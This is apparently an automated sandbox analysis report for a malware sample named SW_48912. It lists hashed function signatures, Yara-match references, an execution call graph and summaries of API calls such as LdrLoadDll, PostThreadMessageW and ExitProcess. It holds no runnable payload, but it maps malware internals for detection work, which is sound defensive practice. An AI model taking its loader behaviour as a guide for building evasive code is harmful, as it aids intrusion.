                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dd588555259bdba96867d8e5a92a52c63bbde35f0c5a67843d2f8e518213b0b6
                                                                                                                      • Instruction ID: 430f0fbfd632d9b13349028904a501379170ed5eed002dee7092a94fa8d63b72
                                                                                                                      • Opcode Fuzzy Hash: dd588555259bdba96867d8e5a92a52c63bbde35f0c5a67843d2f8e518213b0b6
                                                                                                                      • Instruction Fuzzy Hash: 92E1E9B4E101198FCB54DFA9C5909AEFBF2FF89304F248169D914AB356D730A942CFA0
                                                                                                                      Function 06B8DFF0 Relevance: .3, Instructions: 312COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fcdf5f703ea0a0607cfa46f331a1c860888cf5a521ee1ec4228830dee02381d1
                                                                                                                      • Instruction ID: 168b208a84eeaee307dbb6985c8623dfe32111f85238d6a1c13ea975995b354b
                                                                                                                      • Opcode Fuzzy Hash: fcdf5f703ea0a0607cfa46f331a1c860888cf5a521ee1ec4228830dee02381d1
                                                                                                                      • Instruction Fuzzy Hash: 1CE1C6B4E101198FDB54DFA9C5909AEBBF2FF89304F248169D819AB355D730A942CFA0
                                                                                                                      Function 06B8E860 Relevance: .3, Instructions: 312COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d56a4041865442072296bd921f808be94ee1796651117a0965a802f3586a263a
                                                                                                                      • Instruction ID: 7c1d17c831f04d3c097d128654cdbd1a0b72d0e86b00cc47e002508169b0d192
                                                                                                                      • Opcode Fuzzy Hash: d56a4041865442072296bd921f808be94ee1796651117a0965a802f3586a263a
                                                                                                                      • Instruction Fuzzy Hash: DBE1D9B4E102198FDB54DFA9C5909AEFBF2FF89304F248169D415AB356D730A942CFA0
                                                                                                                      Function 06F80EB8 Relevance: .3, Instructions: 312COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a482cf080a9f245ba2ce52d85c591ee3dd4de9967e79b3504fb9ada317f98516
                                                                                                                      • Instruction ID: 40acd9d779b7ede3067b6ddaf1921df52a05d1dd87df35638a245266eaec6be1
                                                                                                                      • Opcode Fuzzy Hash: a482cf080a9f245ba2ce52d85c591ee3dd4de9967e79b3504fb9ada317f98516
                                                                                                                      • Instruction Fuzzy Hash: D6E1D7B4E101198FDB54DFA9C5909AEFBF2BF89304F24C269D814AB355D731A942CFA0
                                                                                                                      Function 06F809C0 Relevance: .3, Instructions: 312COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5b0873ee68cf339795cdb438d6a2ff56cf1e0448b20b1c8f1b81049e9e92d840
                                                                                                                      • Instruction ID: 2a009afe3b964c05b4342ed9474b616fd08eda9da1412adc660d3df8f8e45073
                                                                                                                      • Opcode Fuzzy Hash: 5b0873ee68cf339795cdb438d6a2ff56cf1e0448b20b1c8f1b81049e9e92d840
                                                                                                                      • Instruction Fuzzy Hash: 18E109B4E101198FDB54DFA9C5909AEFBF2BF49304F24C169D814AB355DB30A946CFA0
                                                                                                                      Function 0239E714 Relevance: .3, Instructions: 264COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2051026b968dca81815b998dc0133f6fd98a3d04cf32eb748a3e4741da79a9c0
                                                                                                                      • Instruction ID: cc54f54fe80bd68fba270652523bfbaa7707a8095524bdd38531015e8117b95a
                                                                                                                      • Opcode Fuzzy Hash: 2051026b968dca81815b998dc0133f6fd98a3d04cf32eb748a3e4741da79a9c0
                                                                                                                      • Instruction Fuzzy Hash: 20A18D36E00209CFCF15DFB4C8805AEB7B6FF86300B15856AE905AB265DB71E906CF80
                                                                                                                      Function 06B89788 Relevance: .1, Instructions: 81COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 585607a3bbe3e2fc8b8a7448b40ee1ac455d1d01049a777f0d8555a47c2a3b41
                                                                                                                      • Instruction ID: 7a362181db0e3d9d8dceb9b8ec16ccfed0990e8ef12232170c745f83fdc879b8
                                                                                                                      • Opcode Fuzzy Hash: 585607a3bbe3e2fc8b8a7448b40ee1ac455d1d01049a777f0d8555a47c2a3b41
                                                                                                                      • Instruction Fuzzy Hash: 7231CAB1D056189FEB98DF6AC8407AEBBF7BF89300F04C0AAD509A7255DB340985CF51

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                                                                                      Signature Coverage:8.1%
                                                                                                                      Total number of Nodes:135
                                                                                                                      Total number of Limit Nodes:8
                                                                                                                      execution_graph 93775 42bb03 93776 42bb20 93775->93776 93779 1422df0 LdrInitializeThunk 93776->93779 93777 42bb48 93779->93777 93780 424b83 93784 424b9c 93780->93784 93781 424be4 93788 42e603 93781->93788 93784->93781 93785 424c27 93784->93785 93787 424c2c 93784->93787 93786 42e603 RtlFreeHeap 93785->93786 93786->93787 93791 42c8a3 93788->93791 93790 424bf4 93792 42c8bd 93791->93792 93793 42c8ce RtlFreeHeap 93792->93793 93793->93790 93794 42f6a3 93795 42f6b3 93794->93795 93796 42f6b9 93794->93796 93799 42e6e3 93796->93799 93798 42f6df 93802 42c853 93799->93802 93801 42e6fe 93801->93798 93803 42c870 93802->93803 93804 42c881 RtlAllocateHeap 93803->93804 93804->93801 93907 4247f3 93908 42480f 93907->93908 93909 424837 93908->93909 93910 42484b 93908->93910 93911 42c533 NtClose 93909->93911 93912 42c533 NtClose 93910->93912 93913 424840 93911->93913 93914 424854 93912->93914 93917 42e723 RtlAllocateHeap 93914->93917 93916 42485f 93917->93916 93805 1422b60 LdrInitializeThunk 93806 41b183 93807 41b1c7 93806->93807 93808 41b1e8 93807->93808 93810 42c533 93807->93810 93811 42c54d 93810->93811 93812 42c55e NtClose 93811->93812 93812->93808 93813 413983 93814 4139a5 93813->93814 93816 42c7c3 93813->93816 93817 42c7e0 93816->93817 93820 1422c70 LdrInitializeThunk 93817->93820 93818 42c808 93818->93814 93820->93818 93918 41a453 93919 41a46b 93918->93919 93921 41a4c5 93918->93921 93919->93921 93922 41e373 93919->93922 93923 41e399 93922->93923 93927 41e490 93923->93927 93928 42f7d3 93923->93928 93925 41e42e 93926 42bb53 LdrInitializeThunk 93925->93926 93925->93927 93926->93927 93927->93921 93929 42f743 93928->93929 93930 42f7a0 93929->93930 93931 42e6e3 RtlAllocateHeap 93929->93931 93930->93925 93932 42f77d 93931->93932 93933 42e603 RtlFreeHeap 93932->93933 93933->93930 93934 413ef3 93935 413f0d 93934->93935 93940 4176b3 93935->93940 93937 413f2b 93938 413f5f PostThreadMessageW 93937->93938 93939 413f70 93937->93939 93938->93939 93941 4176d7 93940->93941 93942 417713 LdrLoadDll 93941->93942 93943 4176de 93941->93943 93942->93943 93943->93937 93821 401ac3 93822 401ad1 93821->93822 93825 42fb73 93822->93825 93828 42e1b3 93825->93828 93829 42e1d9 93828->93829 93840 407383 93829->93840 93831 42e1ef 93839 401b60 93831->93839 93843 41af93 93831->93843 93833 42e20e 93836 42e223 93833->93836 93858 42c8f3 93833->93858 93854 428093 93836->93854 93837 42e23d 93838 42c8f3 ExitProcess 93837->93838 93838->93839 93842 407390 93840->93842 93861 416363 93840->93861 93842->93831 93844 41afbf 93843->93844 93879 41ae83 93844->93879 93847 41b004 93849 41b020 93847->93849 93852 42c533 NtClose 93847->93852 93848 41afec 93850 41aff7 93848->93850 93851 42c533 NtClose 93848->93851 93849->93833 93850->93833 93851->93850 93853 41b016 93852->93853 93853->93833 93855 4280f5 93854->93855 93857 428102 93855->93857 93890 418513 93855->93890 93857->93837 93859 42c90d 93858->93859 93860 42c91e ExitProcess 93859->93860 93860->93836 93862 416380 93861->93862 93864 416399 93862->93864 93865 42cfa3 93862->93865 93864->93842 93867 42cfbd 93865->93867 93866 42cfec 93866->93864 93867->93866 93872 42bb53 93867->93872 93870 42e603 RtlFreeHeap 93871 42d062 93870->93871 93871->93864 93873 42bb70 93872->93873 93876 1422c0a 93873->93876 93874 42bb9c 93874->93870 93877 1422c11 93876->93877 93878 1422c1f LdrInitializeThunk 93876->93878 93877->93874 93878->93874 93880 41af79 93879->93880 93881 41ae9d 93879->93881 93880->93847 93880->93848 93885 42bbf3 93881->93885 93884 42c533 NtClose 93884->93880 93886 42bc10 93885->93886 93889 14235c0 LdrInitializeThunk 93886->93889 93887 41af6d 93887->93884 93889->93887 93892 418514 93890->93892 93891 418a2b 93891->93857 93892->93891 93898 413b63 93892->93898 93894 418658 93894->93891 93895 42e603 RtlFreeHeap 93894->93895 93896 418670 93895->93896 93896->93891 93897 42c8f3 ExitProcess 93896->93897 93897->93891 93902 413b83 93898->93902 93900 413be2 93900->93894 93901 413bec 93901->93894 93902->93901 93903 41b2a3 RtlFreeHeap LdrInitializeThunk 93902->93903 93903->93900 93904 418c48 93905 418c52 93904->93905 93906 42c533 NtClose 93904->93906 93906->93905

                                                                                                                      Executed Functions

                                                                                                                      Function 004176B3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 221 4176b3-4176cf 222 4176d7-4176dc 221->222 223 4176d2 call 42f1e3 221->223 224 4176e2-4176f0 call 42f7e3 222->224 225 4176de-4176e1 222->225 223->222 228 417700-417711 call 42dc83 224->228 229 4176f2-4176fd call 42fa83 224->229 234 417713-417727 LdrLoadDll 228->234 235 41772a-41772d 228->235 229->228 234->235
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                                                      • Instruction ID: b88247e3bf074f405839055fc92c8dfc4e22cdda4e1e567452dbb1709a050ac5
                                                                                                                      • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                                                      • Instruction Fuzzy Hash: B60125B5E0020DABDF10DBE5DC42FDEB7789B54308F4041A6E91897280FA75EB58CB95
                                                                                                                      Function 0042C533 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 400 42c533-42c56c call 4047d3 call 42d793 NtClose
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C567
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 4fd420b1cf45f968bd5c101bb5892aae1e7638fed89652d678df022ed48024bd
                                                                                                                      • Instruction ID: 8d926487dfcd4b78fc97b4d09a9081267ac143cf4d7600c1d6712fb6aa153d77
                                                                                                                      • Opcode Fuzzy Hash: 4fd420b1cf45f968bd5c101bb5892aae1e7638fed89652d678df022ed48024bd
                                                                                                                      • Instruction Fuzzy Hash: E8E046762003147BD620AA6ADC45FEB776DDBCA724F01442AFA08A7641C6B4B91186F9
                                                                                                                      Function 01422B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 414 1422b60-1422b6c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 6bcd4f83b35e9215b5805ec580c2bef7149d1647b22f139d684cd714fc8af498
                                                                                                                      • Instruction ID: 380677072ded86e938762bdc90c522b65d5e03485e6c873502698c72ce6e7809
                                                                                                                      • Opcode Fuzzy Hash: 6bcd4f83b35e9215b5805ec580c2bef7149d1647b22f139d684cd714fc8af498
                                                                                                                      • Instruction Fuzzy Hash: 3890026120240103410571584414616801A97F4201B55C122F1018591DC63589927225
                                                                                                                      Function 01422DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 313a643b4c42a28d6e06bf89c0727852f810f27002c42073be410b2d913571a4
                                                                                                                      • Instruction ID: bd67403fd2a9d8978e2d513cbd646b4da8cf7a7493590f644cfc29f5637ae1cf
                                                                                                                      • Opcode Fuzzy Hash: 313a643b4c42a28d6e06bf89c0727852f810f27002c42073be410b2d913571a4
                                                                                                                      • Instruction Fuzzy Hash: C990023120140513D11171584504707401997E4241F95C513B0428559DD7668A53B221
                                                                                                                      Function 01422C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c14c144671b0669951149e36eb0afbb3db3561cd80e68c3629a22689d69b2d4c
                                                                                                                      • Instruction ID: a352bec93e72211b6d0601dad0f5d69ce4cc3f8eddda477f3779edef906361a8
                                                                                                                      • Opcode Fuzzy Hash: c14c144671b0669951149e36eb0afbb3db3561cd80e68c3629a22689d69b2d4c
                                                                                                                      • Instruction Fuzzy Hash: 8390023120148902D1107158840474A401597E4301F59C512B4428659DC7A589927221
                                                                                                                      Function 014235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: aa9a8e4d05ba4f1241fff7493566014b474cf63ddd47ce1ab3194bd76b001fc2
                                                                                                                      • Instruction ID: e48cc2267a0c4edd9f0ac3402002e21ddad27a4ab04effca0472b47c560b2d33
                                                                                                                      • Opcode Fuzzy Hash: aa9a8e4d05ba4f1241fff7493566014b474cf63ddd47ce1ab3194bd76b001fc2
                                                                                                                      • Instruction Fuzzy Hash: 0A90023160550502D10071584514706501597E4201F65C512B0428569DC7A58A5276A2
                                                                                                                      Function 00413EEB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(u235K44,00000111,00000000,00000000), ref: 00413F6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: u235K44$u235K44
                                                                                                                      • API String ID: 1836367815-887001147
                                                                                                                      • Opcode ID: c9eb5df96e2f0bd96265019e1d5fa2bdfef285177db49589759599aa2393896e
                                                                                                                      • Instruction ID: 27c3d0d9d83f355a6b7f16d1443714ba523b8611c8eb3533a7d20312a9691806
                                                                                                                      • Opcode Fuzzy Hash: c9eb5df96e2f0bd96265019e1d5fa2bdfef285177db49589759599aa2393896e
                                                                                                                      • Instruction Fuzzy Hash: F8110C72D4021C7EDB109AE69C81DEF7B7CDF41798F448069F904B7241D67C4E0647A6
                                                                                                                      Function 00413EF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(u235K44,00000111,00000000,00000000), ref: 00413F6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: u235K44$u235K44
                                                                                                                      • API String ID: 1836367815-887001147
                                                                                                                      • Opcode ID: 134d3b73d867660f3c76aa4594cea828aa13d5025f13d4cfc044d6451923f2c5
                                                                                                                      • Instruction ID: f0c038a495d0d9d9337380d7088d780e69d95496bfea66c58b45b8b9ba8e4ff5
                                                                                                                      • Opcode Fuzzy Hash: 134d3b73d867660f3c76aa4594cea828aa13d5025f13d4cfc044d6451923f2c5
                                                                                                                      • Instruction Fuzzy Hash: 6E012672E4021C7ADB00AAE68C82DEF7B7CDF41798F448029FA04B7241D6784E068BB5
                                                                                                                      Function 004176A6 Relevance: 1.6, APIs: 1, Instructions: 91libraryloaderCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 191 4176a6-4176a8 192 417653-417656 191->192 193 4176aa-4176ae 191->193 194 417658-41765d 192->194 195 41766c-41767d call 4173d3 192->195 196 4176b0-4176dc call 42f1e3 193->196 197 4176e7-4176f0 193->197 200 417663-41766a 194->200 211 4176a2-4176a5 195->211 212 41767f-417683 195->212 207 4176e2-4176f0 call 42f7e3 196->207 208 4176de-4176e1 196->208 198 417700-417711 call 42dc83 197->198 199 4176f2-4176fd call 42fa83 197->199 213 417713-417727 LdrLoadDll 198->213 214 41772a-41772d 198->214 199->198 200->195 200->200 207->198 207->199 215 417686-41768d 212->215 213->214 215->215 218 41768f-417692 215->218 218->211 219 417694-417696 218->219 220 417699-4176a0 219->220 220->211 220->220
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: cc9a0ee59fc0f425b1dea6033d3a6057e6ce4d5b60ccdda23339aebc599060a3
                                                                                                                      • Instruction ID: be8895f1112ed76155a28bbeeebdaff540bdea10eb797164b7d23afff38fba94
                                                                                                                      • Opcode Fuzzy Hash: cc9a0ee59fc0f425b1dea6033d3a6057e6ce4d5b60ccdda23339aebc599060a3
                                                                                                                      • Instruction Fuzzy Hash: B1217871D0C1465FDB10DB689C91BEEBBB5DF51218F0800DBE8988B242E936DA48C715
                                                                                                                      Function 0042C853 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 236 42c853-42c897 call 4047d3 call 42d793 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,0041E42E,?,?,00000000,?,0041E42E,?,?,?), ref: 0042C892
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: b73f5855ba8e18057ba849c7c3da7b6c9aacfe489b09c0c2e6e5cb3285ac220c
                                                                                                                      • Instruction ID: 8a41ba94fba150c4a7d0c6f4774c88b0e23220638a1fb62e529ffdb8faeb0955
                                                                                                                      • Opcode Fuzzy Hash: b73f5855ba8e18057ba849c7c3da7b6c9aacfe489b09c0c2e6e5cb3285ac220c
                                                                                                                      • Instruction Fuzzy Hash: 76E06D72604308BBD610EE59EC41EAB37ADEFC9710F004419FA09A7242C670B91087B9
                                                                                                                      Function 0042C8A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 241 42c8a3-42c8e4 call 4047d3 call 42d793 RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84589F4,00000007,00000000,00000004,00000000,00416F25,000000F4), ref: 0042C8DF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 14c63d24e0aa0e9cc3c0093f06c20af4ee7af7e906eb0dad54e3e8771c8b5368
                                                                                                                      • Instruction ID: 0a30bab6d55ad135eeed097a5d6790394392834d135802c008717084d5b70ca7
                                                                                                                      • Opcode Fuzzy Hash: 14c63d24e0aa0e9cc3c0093f06c20af4ee7af7e906eb0dad54e3e8771c8b5368
                                                                                                                      • Instruction Fuzzy Hash: 99E06DB6200204BBD614EE59DC41FAB33ADEFC9714F00041AFA08A7241D774B9108AB9
                                                                                                                      Function 0042C8F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 405 42c8f3-42c92c call 4047d3 call 42d793 ExitProcess
                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,34EED896,?,?,34EED896), ref: 0042C927
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: 7569b89ab91bf1aeb1bea4a51f14b39ee0c427051f7aea902373c5cb946b96bc
                                                                                                                      • Instruction ID: 9eece9e5545b71105f86df05dc2022988576f706cbbce76d3d5f96f774a0597d
                                                                                                                      • Opcode Fuzzy Hash: 7569b89ab91bf1aeb1bea4a51f14b39ee0c427051f7aea902373c5cb946b96bc
                                                                                                                      • Instruction Fuzzy Hash: 9CE08C362106147BD620FA5AEC81FDBB76DEFC5724F00442AFA08A7281C7B4B91087F5
                                                                                                                      Function 01422C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 410 1422c0a-1422c0f 411 1422c11-1422c18 410->411 412 1422c1f-1422c26 LdrInitializeThunk 410->412
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 244ceb41d760cfecd9cf04005f88ad64321317489b22aa31ed4d3a9d0c189b69
                                                                                                                      • Instruction ID: 81534222751e34b2d4763277e5f85b8a3a0cedf6141eb2e07a15a73a542339be
                                                                                                                      • Opcode Fuzzy Hash: 244ceb41d760cfecd9cf04005f88ad64321317489b22aa31ed4d3a9d0c189b69
